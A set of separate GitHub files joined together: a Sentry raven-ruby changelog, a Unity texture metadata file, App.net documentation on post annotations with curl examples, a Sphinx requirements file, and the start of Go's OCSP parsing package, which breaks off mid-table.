- fix: Don't log warning messages when it doesn't need to (#1000)
- fix: Revert "Refactor Raven::Client class" (#1002)
## 3.0.3
- fix: Ensure Processor::Cookie can run after Processor::RemoveCircularReferences (#996)
- fix: Avoid mutating user passed in options (#994)
- fix: Fix/Refactor Raven::Cli (#989)
- ref: Refactor Raven::Client class (#995)
- It adds `Event#message_from_exception` and `Event#log_message` interfaces
## 3.0.2
- fix: Add gem target for craft
## 3.0.1
- fix: Improve SanitizeData processor (#984)
- fix: Masking cookies as key/pair instead of a single string (#983)
- fix: Transports classes' requiring issue (#986)
- fix: Frozen string issues (#977)
- feat: Officially support Rails 6 (#982)
3.0.0
----
* SDK now requires Ruby >= 2.3
* REF: Retain any literal "HTTP-" in header names [@elliterate, #950]
* REF: Delete JSON spec for recursive hashes [@ksylvest, #952]
* FEAT: Bump faraday version to latest [@ksylvest, #946]
2.13.0
----
* FIX: Sanitize event data before they are sent to async job. [@edariedl, #895]
* FIX: Serialization MongoDB ObjectId to JSON problem with gem delayed_job_mongoid conjunction. [@eagleas, #935]
* FEAT: Skip ActiveJob integration if there is a better one [@fsateler, #909]
* FIX: Bugs with send_event in asynchronous mode (#940) [@cstyles, #940]
2.12.3
----
* FIX: crash when Process.wait is used [@asBrettisay, #895]
2.12.2
----
* FIX: return tags/extra for [@rivayama, #931]
2.12.1
----
* FIX: undefined method `[]' for nil:NilClass [@HazAT, #932]
2.12.0
----
* FIX: Remove duplicate message when exception is emitted
* FIX: Frozen string bug in utf8conversation
* FEATURE: Allow block on tags_context and extra_context
2.11.3
----
* FIX: infinite backoff under pressure [@Bonias, #886]
2.11.2
----
* REF: Warn on 4xx error [@iloveitaly, #862]
2.11.1
----
* FIX: Call `to_s` on breadcrumb message [@halkeye, #914]
2.11.0
----
* FEATURE: Prepend the transaction around_action so libraries with controllers can alter the value. [@drcapulet, #887]
2.10.0
-----
* FEATURE: Added support for `SENTRY_ENVIRONMENT` [@mtsmfm, #910]
* FEATURE: Added support for `SENTRY_RELEASE` [@coorasse, #911]
2.9.0
-----
* FEATURE: Added `config.inspect_exception_causes_for_exclusion`. Determines if the exception cause should be inspected for `config.excluded_exceptions` option. [@effron, #872]
2.8.0
-----
* FEATURE: Added `config.before_send`. Provide a lambda or proc to this config setting, which will be `call`ed before sending an event to Sentry. Receives `event` and `hint` as parameters. `hint` is a hash `{:exception => ex | nil, :message => message | nil}`. [@hazat, #882]
2.7.4
-----
* BUGFIX: Correctly handle public only DSNs [@mitsuhiko, #847]
* BUGFIX: context attributes with nil raised error [@joker-777, 824]
* BUGFIX: Suppress warning about enabling dyno metadata in Heroku CI [@meganemura, #833]
2.7.3
-----
* BUGFIX: Fix proxy settings for Faraday [@Strnadj, #820]
* BUGFIX: Fix duplicated events in ActiveJob w/DelayedJob and Sidekiq [@BrentWheeldon, #815]
2.7.2
-----
* BUGFIX: GlobalIDs are now displayed correctly in Sidekiq contexts [@louim, #798]
* BUGFIX: If git is not installed, fail silently during release detection [@nateberkopec]
* BUGFIX: We do not support rack-timeout <= 0.2, fix errors when incompat version present [@nateberkopec]
* BUGFIX: Put cookies in the correct spot of event [@nateberkopec, #812]
* BUGFIX: Exception context is deep_merged [@janklimo, #782]
2.7.1
-----
* BUGFIX: Fixed LocalJumpError in Rails controllers [@nateberkopec w/@frodsan, #774]
2.7.0
-----
* FEATURE: Add random sampling. [@nateberkopec, #734]
* FEATURE: Transactions. See Context docs for usage. [@nateberkopec, #743]
* FEATURE: You can set the current environment for Sentry via `SENTRY_CURRENT_ENV` env variable. Useful if your staging environment's RACK_ENV is "production", for example. [@tijmenb, #736]
* BUGFIX: Fix wrapped classnames in old versions of Sidekiq and ActiveJob [@nateberkopec, #702]
* BUGFIX: Server names on Heroku were pretty useless before - now they follow the dyno name ("worker.1", "web.2") [@nateberkopec, #703]
* BUGFIX: ActiveJob::DeserializationError is now ignored by default. Not doing so can cause infinite loops if you are using an ActiveJob async callback. [@nateberkopec, #701]
* BUGFIX: Binary conversion to UTF-8 when binary is frozen is fixed [@nateberkopec, #757]
* BUGFIX: Our credit-card regex now matches Sentry's server behavior, which means it does not censor milliseconds since the epoch [@nateberkopec, #771]
* REFACTOR: We now use an updated port of Rails' deep_merge which should be 5-10% faster [@nateberkopec, #770]
* REFACTOR: Tests have been cleaned up, and now run in random order. [@nateberkopec]
* REFACTOR: Raven::Event has been refactored a bit [@nateberkopec]
2.6.3
-----
* BUGFIX: Fixed typo in the Heroku warning [@greysteil, #728]
* BUGFIX: Swallow IOErrors when reading the Rack request body [@nateberkopec]
* BUGFIX: Fix invalid UTF-8/circular references when using async [@nateberkopec, #730]
2.6.2
-----
* BUGFIX: If using the Sidekiq or DelayedJob adapters with ActiveJob, ActiveJob wouldn't re-raise upon capturing an exception. [@nateberkopec, 5b02ad4ff2]
* KNOWN ISSUE: When using `async`, Rack integration is not thread-safe [#721]
* KNOWN ISSUE: When using `async`, encoding errors may be raised [#725]
2.6.1
-----
* BUGFIX: Fix cases where ActionDispatch::RemoteIP would blow up during event creation [@cmoylan, #722]
* BUGFIX: In ActiveJob, don't report exceptions which can be rescued by rescue_from handlers [@bensheldon, #719]
2.6.0
-----
* FEATURE: raven-ruby now marks itself as the "ruby" logger by default, to match raven-js behavior [@nateberkopec]
* FEATURE: You may now override the default sanitization parameters [#712, @nateberkopec]
* FEATURE: Breadcrumb buffers are now publicly accessible [#686, @nateberkopec]
* FEATURE: We yell at you now if you're using Heroku but don't have runtime-dyno-metadata enabled [#715, @nateberkopec]
* FEATURE: project_root will always be set, regardless of framework [#716, @nateberkopec]
* BUGFIX: Request body and message limits now match Sentry server defaults [#714, @nateberkopec]
* BUGFIX: Sidekiq context now works as expected [#713, @nateberkopec]
* BUGFIX: Capture exceptions in ActiveJob when not using Sidekiq adapter [#709, #671, @nateberkopec]
2.5.3
-----
* BUGFIX: Deal properly with ASCII_8BIT/BINARY encodings [#689, #696, @nateberkopec]
2.5.2
-----
* BUGFIX: raven test executable should be available [#691, @nateberkopec]
* BUGFIX: Fix stack overflow when calling Backtrace#inspect [#690, @nateberkopec]
* KNOWN ISSUE: Character encoding errors [#689]
2.5.1
-----
* BUGFIX: Fix case where Pathname objects are on the load path [@nateberkopec]
* BUGFIX: Fix bad UTF-8 characters in the URL querystring [@nateberkopec]
* BUGFIX: Fix case where rack-timeout could be required twice [@nateberkopec]
* REFACTOR: Slightly cleaner character encoding fixing [@nateberkopec, @bf4]
2.5.0
-----
* FEATURE: Greatly improved performance (2-3x faster capture) [@nateberkopec]
* FEATURE: Frozen objects are now sanitized [@nateberkopec]
* BUGFIX: Grabbing Sidekiq context from "wrapped" classes works [@nateberkopec]
* BUGFIX: Relaxed Faraday dependency [@nateberkopec]
2.4.0
-----
* FEATURE: Allow customization of the Faraday adapter [#639, @StupidCodeFactory]
* BUGFIX: Report the SDK name as "raven-ruby", not "sentry-raven" [#641, @bretthoerner]
* BUGFIX: Sidekiq jobs now clear context/breadcrumbs properly between jobs [#637, @drewish]
* BUGFIX: Overriding the logger in Rails wasn't working [#638, @eugeneius]
2.3.1
-----
* BUGFIX: Backtrace parser fixed for JRuby 9k [#619, @the-michael-toy]
* BUGFIX: Rake tasks should show the correct task name [#621, @Bugagazavr]
* BUGFIX: Formatted messages work if params are `nil` [#625, @miyachik]
* BUGFIX: Backtrace logger on failed event send works with custom formatters [#627, @chulkilee]
* BUGFIX: Fix typo that caused Version headers to not be corrected [#628, @nateberkopec]
* BUGFIX: Faraday errors are more descriptive when no server response [#629, @drewish]
* BUGFIX: DelayedJob handler no longer truncates unneccessarily short [#633, @darrennix]
* BUGFIX: Fix several processors not working correctly w/async jobs stored in backends like Redis [#634, @nateberkopec]
2.3.0
-----
* CHANGE: Log levels of some messages have been changed. Raven logger is INFO level by default. [@nateberkopec]
* BUGFIX: Exception messages are now limited to 10,000 bytes. [#617, @mattrobenolt]
2.2.0
-----
* ENHANCEMENT: Sentry server errors now return some information about the response headers. [#585, @rafadc]
* BUGFIX/ENHANCEMENT: Frozen objects are no longer sanitized. This prevents some bugs, but you can now also freeze objects if you don't want them to be sanitized by the SanitizeData processor. [#594, @nateberkopec]
* ENHANCEMENT: The ability to use Raven::Instance alone is greatly improved. You can now call #capture_exception directly on an Instance (#595), give it it's own Logger (#599), and set it's own config which will be used when creating Events (#601). Thanks to
* ENHANCEMENT: You may now provide your own LineCache-like class to Raven. This is useful if you have source code which is not available on disk. [#606, @nateberkopec]
* BUGFIX: Raven no longer emits anything to STDOUT if a system command fails [#596, @nateberkopec]
* ENHANCEMENT: Raven now tells you exactly why it will not send an event in the logs [#602, @nateberkopec]
2.1.4
-----
* FIX: Remove `contexts` key, because it was disabling browser auto-tagging [#587, @nateberkopec]
2.1.3
-----
* Move `os` context key to `server_os` [@nateberkopec]
2.1.2
-----
* FIX: `sys_command` not falling back to Windows commands properly, logging output [@jmalves, @nateberkopec]
2.1.1
-----
* FIX: Message params should accept nil [@jmalves, #570]
2.1.0
-----
ENHANCEMENTS:
* Your client version is now included in all Events. [@nateberkopec, #559]
* OS and Ruby runtime information now included in all Events. [@nateberkopec, #560]
* Transport errors (like Sentry 4XX errors) now raise Sentry::Error, not Faraday errors. [@nateberkopec, #565]
* Sidekiq integration is streamlined and improved. Supports Sidekiq 3.x and up. [@nateberkopec, #555]
FIXES:
* Heroku release detection is improved and more accurate. You must `heroku labs:enable runtime-dyno-metadata` for it to work. [@nateberkopec, #566]
2.0.2
-----
* FIX: Don't set up Rack-Timeout middleware. [@janraasch, #558]
2.0.1
-----
* FIX: UUIDs were being rejected by Sentry as being too long [@nateberkopec]
2.0.0
-----
BREAKING CHANGES:
* The object passed to the `async` callback is now a JSON-compatible hash, not a Raven::Event. This fixes many bugs with backend job processors like DelayedJob. [@nateberkopec, #547]
* Several deprecated accessors have been removed [@nateberkopec, #543]
* You can no longer pass an object which cannot be called to `should_capture` [@nateberkopec, #542]
ENHANCEMENTS:
* Rack::Timeout exceptions are now fingerprinted by URL, making them more useful [@nateberkopec, #538]
* Added an HTTP header processor by default. We now scrub `Authorization` headers correctly. You can use `config.sanitize_http_headers` to add a list of HTTP headers you don't want sent to Sentry (e.g. ["Via", "Referer", "User-Agent", "Server", "From"]) [@nateberkopec]
FIXES:
* User/Event IP addresses are now set more accurately. This will fix many issues with local proxy setups (nginx, etc). [@nateberkopec, #546]
* We now generate a real UUID in the correct format for Event IDs [@nateberkopec, #549]
* If `async` sending fails, we retry with sync sending. [@nateberkopec, #548]
* Changed truncation approach - event messages and HTTP bodies now limited to the same amount of characters they're limited to at the Sentry server [@nateberkopec, #536]
OTHER:
* Codebase cleaned up with Rubocop [@nateberkopec, #544]
1.2.3
-----
* ENHANCEMENT: Send the current environment to Sentry [@dcramer, #530]
* BUGFIX: Fix all warnings emitted by Ruby verbose mode [@nateberkopec]
* BUGFIX: Fix compat with `log4r` [@nateberkopec, #535]
1.2.2
-----
* BUGFIX: NameError in DelayedJob integration. [janraasch, #525]
1.2.1
-----
* BUGFIX: Context clearing should now work properly in DelayedJob and Sidekiq. Also, we properly clear context if Sentry causes an exception. [nateberkopec, #520]
* BUGFIX: If Sentry will not send the event (due to environments or no DSN set), it will not attempt to "capture" (construct an event) [nateberkopec, #518]
1.2.0
-----
* FEATURE: Raven now supports Breadcrumbs, though they aren't on by default. Check the docs for how to enable. [dcramer, #497]
* FEATURE: Raven is no longer a singleton, you may have many `Raven::Instance`s. [phillbaker, #504]
* PERFORMANCE: Raven no longer uses a vendored JSON implementation. JSON processing and encoding should be up to 6x faster. [dcramer, #510]
* BUGFIX: silence_ready now works for Rails apps. [ream88, #512]
* BUGFIX: transport_failure_callback now works correctly [nateberkopec, #508]
1.1.0
-----
* The client exposes a ``last_event_id`` accessor at `Raven.last_event_id`. [dcramer, #493]
* PERFORMANCE: Skip identical backtraces from "re-raised" exceptions [databus23, #499]
* Support for ActionController::Live and Rails template streaming [nateberkopec, #486]
1.0.0
-----
We (i.e. @nateberkopec) decided that `raven-ruby` has been stable enough for some time that it's time for a 1.0.0 release!
BREAKING CHANGES:
- Dropped support for Ruby 1.8.7 [nateberkopec, #465]
- `raven-ruby` no longer reports form POST data or web cookies by default. To re-enable this behavior, remove the appropriate Processors from your config (see docs or PR) [nateberkopec, #466]
- UDP transport has been removed [dcramer, #472]
OTHER CHANGES:
- Improved performance [zanker]
- Deprecated `config.catch_debugged_exceptions`, replaced with `config.rails_report_rescued_exceptions`. `catch_debugged_exceptions` will be removed in 1.1. [nateberkopec, #483]
- Added `config.transport_failure_callback`. Provide a lambda or proc to this config setting, which will be `call`ed when Sentry returns a 4xx/5xx response. [nateberkopec, #484]
- JRuby builds fixed [RobinDaugherty]
- Fix problems with duplicate exceptions and `Exception.cause` [dcramer, #490]
- Added Exception Context. Any Exception class can define a `raven_context` instance variable, which will be merged into any Event's context which contains this exception. [nateberkopec, #491]
+ Documentation from shaneog, squirly, dcramer, ehfeng, nateberkopec.
0.15.6
------
- Fixed bug where return value of debug middleware was nil [eugeneius, #461]
- Fixed a bug in checking `catch_debugged_exceptions` [greysteil, #458]
- Fixed a deprecation warning for Rails 5 [Elektron1c97, #457]
0.15.5
------
- DelayedJob integration fixed when last_error not present [dcramer, #454]
- Release detection doesn't overwrite manual release setting in Rails [eugeneius, #450]
- Deal properly with Cap 3.0/3.1 revision logs [timcheadle, #449]
- Rails 5 support [nateberkopec, #423]
0.15.4
------
- DelayedJob integration now also truncates last_error to 100 characters [nateberkopec]
- Fix several issues with release detection - silence git log message, fix Capistrano detection [nateberkopec, kkumler]
0.15.3
------
- Double exception reporting in Rails FIXED! [nateberkopec, #422]
- Rails 3 users having issues with undefined runner fixed [nateberkopec, #428]
- Sidekiq integration works properly when ActiveJob enabled [mattrobenolt]
- Fix problems with invalid UTF-8 in exception messages [nateberkopec, #426]
- Backtraces now consider "exe" directories part of the app [nateberkopec, #420]
- Sinatra::NotFound now ignored by default [drcapulet, #383]
- Release versions now properly set. Support for Heroku, Capistrano, and Git. [iloveitaly #377, Sija #380]
- DelayedJob integration plays well with ActiveJob [kkumler, #378]
- DelayedJob handlers now truncated [nateberkopec, #431]
- Tons of code quality improvements [amatsuda, ddrmanxbxfr, pmbrent, cpizzaia, wdhorton, PepperTeasdale]
0.15.2
------
- Reverted ActiveJob support due to conflicts [#368]
0.15.1
------
- Fix ActiveJob support [greysteil, #367]
0.15.0
------
- Remove Certifi and use default Ruby SSL config [zanker, #352]
- Support for ``fingerprint`` [dcramer]
- Improved documentation and tests around various attributes [dcramer]
- Allow configurable integrations [cthornton]
- Prevent recursion with ``Exception.cause`` [dcramer, #357]
- Use empty hash if false-y value [GeekOnCoffee, #354]
- Correct some behavior with at_exit error capturing [kratob, #355]
- Sanitize matches whole words [alyssa, #361]
- Expose more debugging info to active_job integration [tonywok, #365]
- Capture exceptions swallowed by rails [robertclancy, #343]
- Sanitize the query string when the key is a symbol [jason-o-matic, #349]
- Moved documentation to docs.getsentry.com [mitsuhiko]
0.14.0
------
- Correct handling of JRuby stacktraces [dcramer]
- Better handling of unreachable file contexts [dcramer, #335]
- SSL is now default ON [dcramer, #338]
- Capture exceptions in runner tasks [eugeneius, #339]
- ActiveJob integration [lucasmazza, #327]
- Cleanup return values of async blocks [lucasmazza, #344]
- Better handling when sending NaN/Infinity JSON values [Alric, #345]
- Fix issues with digest/md5 namespace [lsb, #346]
0.13.3
------
- Fix a deprecation warning being shown in regular operation [ripta, #332]
0.13.2
------
- DelayedJob integration now includes the job id [javawizard, #321]
- Rails integration now works properly when you're not using all parts of Rails (e.g. just ActiveRecord) [lucasmazza, #323]
- Bugfix CLI tool when async config is on [if1live, #324]
- Fix and standardize tag hierarchies. Event tags > context tags > configuration tags in all cases. [JonathanBatten, #322 and eugeneius, #330]
- Using #send on Client, Base, and Transports is now deprecated. See [the commit](https://github.com/getsentry/raven-ruby/commit/9f482022a648ab662c22177ba24fd2e2b6794c34) (or the deprecation message) for their replacements. [nateberkopec, #326]
- You can now disable credit-card-like value filtering. [codekitchen, #329]
0.13.1
------
- Raven::Transports::HTTP#send returns the response now. [eagletmt, #317]
- Filenames now work a lot better when you vendor your gems. [eugeneius, #316]
- Fix raven:test issue when testing non-async configurations. [weynsee, #318]
- Fix blockless Raven#capture. [dinosaurjr, #320]
- Fix some log messages [eagletmt, #319]
0.13.0
------
- Support exception chaining [javawizard, #312]
- Add support for sending release version [eugeneius, #310]
- Better status reports on configuration [faber, #309]
- Client "send" method accepts an event in object or hash format - this will make it much easier to send Sentry events in a delayed job! [marclennox, #300]
- Fix duplicate fields in SanitizeData [wyattisimo, #294]
- Always preserve filename paths under project_root [eugeneius, #291]
- Truncate project root prefixes from filenames [eagletmt, #278]
- Renamed should_send callback to should_capture [nateberkopec, #270]
- Silencing the ready message now happens in the config as normal [nateberkopec, #260]
- Various internal refactorings [see here](https://github.com/getsentry/raven-ruby/compare/0-12-stable...master)
0.12.3
------
- URL query parameters are now sanitized for sensitive data [pcorliss, #275]
- Raven::Client can now use a proxy server when sending events to Sentry [dcramer, #277]
- Raven::Client will now use a timed backoff strategy if the server fails [codekitchen, #267]
- Automatic integration loading is now a lot less brittle [dcramer, handlers, #263, #264]
- Fixed some issues with prefixes and DSN strings [nateberkopec, #259]
- If Raven is initialized without a server config, it will no longer send events [nateberkopec, #258]
- Slightly nicer credit-card-like number scrubbing [nateberkopec, #254]
- Fix some exceptions not being caught by Sidekiq middleware [nateberkopec, #251]
- Uncommon types are now encoded correctly [nateberkopec, #249]
0.12.2
------
- Security fix where exponential numbers in specially crafted params could cause a CPU attack [dcramer, #262]
0.12.1
------
- Integrations (Sidekiq, DelayedJob, etc) now load independently of your Gemfile order. [nateberkopec, #236]
- Fixed bug where setting tags mutated your configuration [berg, #239]
- Fixed several issues with SanitizeData and UTF8 sanitization processors [nateberkopec, #238, #241, #244]
0.12.0
------
- You can now give additional fields to the SanitizeData processor. Values matched are replaced by the string mask (*********). Full documentation (and how to use with Rails config.filter_parameters) [here](https://docs.sentry.io/platforms/ruby/config/). [jamescway, #232]
- An additional processor has been added, though it isn't turned on by default: RemoveStacktrace. Use it to remove stacktraces from exception reports. [nateberkopec, #233]
- Dependency on `uuidtools` has been removed. [nateberkopec, #231]
0.11.2
------
- Fix some issues with the SanitizeData processor when processing strings that look like JSON
0.11.1
------
- Raven now captures exceptions in Rake tasks automatically. [nateberkopec, troelskn #222]
- There is now a configuration option called ```should_send``` that can be configured to use a Proc to determine whether or not an event should be sent to Sentry. This can be used to implement rate limiters, etc. [nateberkopec, #221]
- Raven now includes three event processors by default instead of one, which can be turned on and off independently. [nateberkopec, #223]
- Fixed bug with YAJL compatibility. [nateberkopec, #223]
0.10.1
------
- Updated to RSpec 3.
- Apply filters to encoded JSON data.
0.10.0
------
- Events are now sent to Sentry in all environments. To change this behavior, either unset ```SENTRY_DSN``` or explicitly configure it via ```Raven.configure```.
- gzip is now the default encoding
- Removed hashie dependency
0.9.0
-----
- Native support for Delayed::Job [pkuczynski, #176]
- Updated to Sentry protocol version 5
0.5.0
-----
- Rails 2 support [sluukonen, #45]
- Controller methods in Rails [jfirebaugh]
- Runs by default in any environment other than test, cucumber, or development. [#81]
| {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: 43377eaa5df746b4aae828047f51089c
timeCreated: 1489880985
licenseType: Store
TextureImporter:
fileIDToRecycleName: {}
serializedVersion: 2
mipmaps:
mipMapMode: 0
enableMipMap: 1
linearTexture: 0
correctGamma: 0
fadeOut: 0
borderMipMap: 0
mipMapFadeDistanceStart: 1
mipMapFadeDistanceEnd: 3
bumpmap:
convertToNormalMap: 0
externalNormalMap: 0
heightScale: 0.25
normalMapFilter: 0
isReadable: 0
grayScaleToAlpha: 0
generateCubemap: 0
cubemapConvolution: 0
cubemapConvolutionSteps: 7
cubemapConvolutionExponent: 1.5
seamlessCubemap: 0
textureFormat: -1
maxTextureSize: 2048
textureSettings:
filterMode: -1
aniso: -1
mipBias: -1
wrapMode: -1
nPOTScale: 1
lightmap: 0
rGBM: 0
compressionQuality: 50
allowsAlphaSplitting: 0
spriteMode: 0
spriteExtrude: 1
spriteMeshType: 1
alignment: 0
spritePivot: {x: 0.5, y: 0.5}
spriteBorder: {x: 0, y: 0, z: 0, w: 0}
spritePixelsToUnits: 100
alphaIsTransparency: 0
spriteTessellationDetail: -1
textureType: -1
buildTargetSettings: []
spriteSheet:
serializedVersion: 2
sprites: []
outline: []
spritePackingTag:
userData:
assetBundleName:
assetBundleVariant:
| {
"pile_set_name": "Github"
} |
---
title: "Using Annotations"
---
# Using Annotations
* TOC
{:toc}
Annotations are metadata that can be attached to Users, Posts, Channels, Messages, or Files. This allows developers and users to add extra information to App.net objects outside of the fields App.net has already defined.
## What's so great about annotations?
Annotations give developers a tremendous degree of freedom to expand upon the core functionality of App.net. They provide a way for developers to add arbitrary data to App.net objects, enabling richer content and new services.
Let's say I'm at a restaurant eating a great dinner, but instead of just telling my followers about this restaurant I want them to be able to see a map of where it is. My Post could include geographic information about the address for the restaurant in an annotation and then clients that support this geographic annotation could show the restaurant on a map (in addition to showing my post). If the restaurant is on [OpenTable](http://www.opentable.com), I could include an annotation indicating that and my followers could see the menu and make a reservation in their own App.net client.
## Anatomy of an annotation
Annotations are a list of objects that have a `type` and a `value`.
<%= json_output([
{
"type" => "com.example.awesome",
"value" => {
"annotations work" => "beautifully"
}
}
]) %>
The `type` field identifies essentially a schema for the `value` of the annotation. Please see the [annotations reference](/reference/meta/annotations/#documenting-annotations) for more information about different kinds of annotations.
## Example: Attach an image to a post
When you see an image included in an App.net post, you see the results of annotations at work. We'll be using the [`net.app.core.oembed`](https://github.com/appdotnet/object-metadata/blob/master/annotations/net.app.core.oembed.md) annotation to embed a photo in an App.net post.
<% data = {
"text" => "Hello App.net from curl, with a photo!",
"annotations" => [
{
"type" => "net.app.core.oembed",
"value" => {
"type" => "photo",
"version" => "1.0",
"width" => 870,
"height" => 106,
"url" => "https://files.app.net/2jxk2CoP4",
"thumbnail_width" => 200,
"thumbnail_height" => 24,
"thumbnail_url" => "https://files.app.net/2jxk12R7F",
"embeddable_url" => "https://app.net"
}
}
]
} %>
<%= curl_example(:post, "posts?include_annotations=1", :none, {:data => data}) %>
Most clients expect `thumbnail_url`, `thumbnail_width`, and `thumbnail_height` to render a preview inline with the post.
## Example: Attach an App.net file to a post as an image
Most apps that include images don't generate a raw oembed annotation to an image hosted somewhere else, they use the [App.net File storage](/reference/resources/files/). To do this, first you have to upload a file to App.net and then you have to create the post with an annotation as we did above.
### Upload a file
<%= curl_example(:post, "files", :none, {
:files => {
"type" => "testing.image",
"content" => "@filename.png;type=image/png",
}
}) %>
This will return a JSON blob similar with the following fields we care about:
<%= json_output({
"data" => {
"file_token" => "1234567NQD4isqELTZlIiEd9fp24e5wC1NACSYFI_Svc7-hkvCKWOTsOPQLrrMiVu-9x2L400MbKlG4T8-WA97HokUdApqXwtQjJt9wOJ12ZZX_hZSFmj_O0xFlvJt8rwqaTAOvK7qECaj1LS131baLjJojErPB5TwZiQQJko0BU",
"id" => "123",
},
}) %>
### Attach the file to a post
Once we've uploaded the file, we can attach it to a post and let App.net generate the correct oembed annotation:
<% data = {
"text" => "Hello App.net from curl, with an App.net hosted photo!",
"annotations" => [{
"type" => "net.app.core.oembed",
"value" => {
"+net.app.core.file" => {
"file_id" => "<data.file_id from the last command>",
"file_token" => "<data.file_token from the last command>",
"format" => "oembed"
}
}
}]
} %>
<%= curl_example(:post, "posts?include_annotations=1", :none, {:data => data}) %>
Since annotations can contain up to [8192 bytes of data](/reference/meta/annotations/#limit), they are not returned by default. We have to explicitly request that App.net return annotations by passing the `include_annotations=1` query string parameter.
| {
"pile_set_name": "Github"
} |
# force older sphinx version for readthedocs build
sphinx==1.6.7
sphinx-fortran
| {
"pile_set_name": "Github"
} |
// Copyright 2013 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// Package ocsp parses OCSP responses as specified in RFC 2560. OCSP responses
// are signed messages attesting to the validity of a certificate for a small
// period of time. This is used to manage revocation for X.509 certificates.
package ocsp // import "golang.org/x/crypto/ocsp"
import (
"crypto"
"crypto/ecdsa"
"crypto/elliptic"
"crypto/rand"
"crypto/rsa"
_ "crypto/sha1"
_ "crypto/sha256"
_ "crypto/sha512"
"crypto/x509"
"crypto/x509/pkix"
"encoding/asn1"
"errors"
"fmt"
"math/big"
"strconv"
"time"
)
var idPKIXOCSPBasic = asn1.ObjectIdentifier([]int{1, 3, 6, 1, 5, 5, 7, 48, 1, 1})
// ResponseStatus contains the result of an OCSP request. See
// https://tools.ietf.org/html/rfc6960#section-2.3
type ResponseStatus int
const (
Success ResponseStatus = 0
Malformed ResponseStatus = 1
InternalError ResponseStatus = 2
TryLater ResponseStatus = 3
// Status code four is unused in OCSP. See
// https://tools.ietf.org/html/rfc6960#section-4.2.1
SignatureRequired ResponseStatus = 5
Unauthorized ResponseStatus = 6
)
func (r ResponseStatus) String() string {
switch r {
case Success:
return "success"
case Malformed:
return "malformed"
case InternalError:
return "internal error"
case TryLater:
return "try later"
case SignatureRequired:
return "signature required"
case Unauthorized:
return "unauthorized"
default:
return "unknown OCSP status: " + strconv.Itoa(int(r))
}
}
// ResponseError is an error that may be returned by ParseResponse to indicate
// that the response itself is an error, not just that its indicating that a
// certificate is revoked, unknown, etc.
type ResponseError struct {
Status ResponseStatus
}
func (r ResponseError) Error() string {
return "ocsp: error from server: " + r.Status.String()
}
// These are internal structures that reflect the ASN.1 structure of an OCSP
// response. See RFC 2560, section 4.2.
type certID struct {
HashAlgorithm pkix.AlgorithmIdentifier
NameHash []byte
IssuerKeyHash []byte
SerialNumber *big.Int
}
// https://tools.ietf.org/html/rfc2560#section-4.1.1
type ocspRequest struct {
TBSRequest tbsRequest
}
type tbsRequest struct {
Version int `asn1:"explicit,tag:0,default:0,optional"`
RequestorName pkix.RDNSequence `asn1:"explicit,tag:1,optional"`
RequestList []request
}
type request struct {
Cert certID
}
type responseASN1 struct {
Status asn1.Enumerated
Response responseBytes `asn1:"explicit,tag:0,optional"`
}
type responseBytes struct {
ResponseType asn1.ObjectIdentifier
Response []byte
}
type basicResponse struct {
TBSResponseData responseData
SignatureAlgorithm pkix.AlgorithmIdentifier
Signature asn1.BitString
Certificates []asn1.RawValue `asn1:"explicit,tag:0,optional"`
}
type responseData struct {
Raw asn1.RawContent
Version int `asn1:"optional,default:0,explicit,tag:0"`
RawResponderID asn1.RawValue
ProducedAt time.Time `asn1:"generalized"`
Responses []singleResponse
}
type singleResponse struct {
CertID certID
Good asn1.Flag `asn1:"tag:0,optional"`
Revoked revokedInfo `asn1:"tag:1,optional"`
Unknown asn1.Flag `asn1:"tag:2,optional"`
ThisUpdate time.Time `asn1:"generalized"`
NextUpdate time.Time `asn1:"generalized,explicit,tag:0,optional"`
SingleExtensions []pkix.Extension `asn1:"explicit,tag:1,optional"`
}
type revokedInfo struct {
RevocationTime time.Time `asn1:"generalized"`
Reason asn1.Enumerated `asn1:"explicit,tag:0,optional"`
}
var (
oidSignatureMD2WithRSA = asn1.ObjectIdentifier{1, 2, 840, 113549, 1, 1, 2}
oidSignatureMD5WithRSA = asn1.ObjectIdentifier{1, 2, 840, 113549, 1, 1, 4}
oidSignatureSHA1WithRSA = asn1.ObjectIdentifier{1, 2, 840, 113549, 1, 1, 5}
oidSignatureSHA256WithRSA = asn1.ObjectIdentifier{1, 2, 840, 113549, 1, 1, 11}
oidSignatureSHA384WithRSA = asn1.ObjectIdentifier{1, 2, 840, 113549, 1, 1, 12}
oidSignatureSHA512WithRSA = asn1.ObjectIdentifier{1, 2, 840, 113549, 1, 1, 13}
oidSignatureDSAWithSHA1 = asn1.ObjectIdentifier{1, 2, 840, 10040, 4, 3}
oidSignatureDSAWithSHA256 = asn1.ObjectIdentifier{2, 16, 840, 1, 101, 3, 4, 3, 2}
oidSignatureECDSAWithSHA1 = asn1.ObjectIdentifier{1, 2, 840, 10045, 4, 1}
oidSignatureECDSAWithSHA256 = asn1.ObjectIdentifier{1, 2, 840, 10045, 4, 3, 2}
oidSignatureECDSAWithSHA384 = asn1.ObjectIdentifier{1, 2, 840, 10045, 4, 3, 3}
oidSignatureECDSAWithSHA512 = asn1.ObjectIdentifier{1, 2, 840, 10045, 4, 3, 4}
)
var hashOIDs = map[crypto.Hash]asn1.ObjectIdentifier{
crypto.SHA1: asn1.ObjectIdentifier([]int{1, 3, 14, 3, 2, 26}),
crypto.SHA256: asn1.ObjectIdentifier([]int{2, 16, 840, 1, 101, 3, 4, 2, 1}),
crypto.SHA384: asn1.ObjectIdentifier([]int{2, 16, 840, 1, 101, 3, 4, 2, 2}),
crypto.SHA512: asn1.ObjectIdentifier([]int{2, 16, 840, 1, 101, 3, 4, 2, 3}),
}
// TODO(rlb): This is also from crypto/x509, so same comment as AGL's below
var signatureAlgorithmDetails = []struct {
algo x509.SignatureAlgorithm
oid asn1.ObjectIdentifier
pubKeyAlgo x509.PublicKeyAlgorithm
hash crypto.Hash
}{
{x509.MD2WithRSA, oidSignatureMD2WithRSA, x509.RSA, crypto.Hash(0) /* no value for MD2 */},
{x509.MD5WithRSA, oidSignatureMD5WithRSA, x509.RSA, crypto.MD5},
{x509.SHA1WithRSA, oidSignatureSHA1WithRSA, x509.RSA, crypto.SHA1},
{x509.SHA256WithRSA, oidSignatureSHA256WithRSA, x509.RSA, crypto.SHA256},
{x509.SHA384WithRSA, oidSignatureSHA384WithRSA, x509.RSA, crypto.SHA384},
{x509.SHA512WithRSA, oidSignatureSHA512WithRSA, x509.RSA, crypto.SHA512},
{x509.DSAWithSHA1, oidSignatureDSAWithSHA1, x509.DSA, crypto.SHA1},
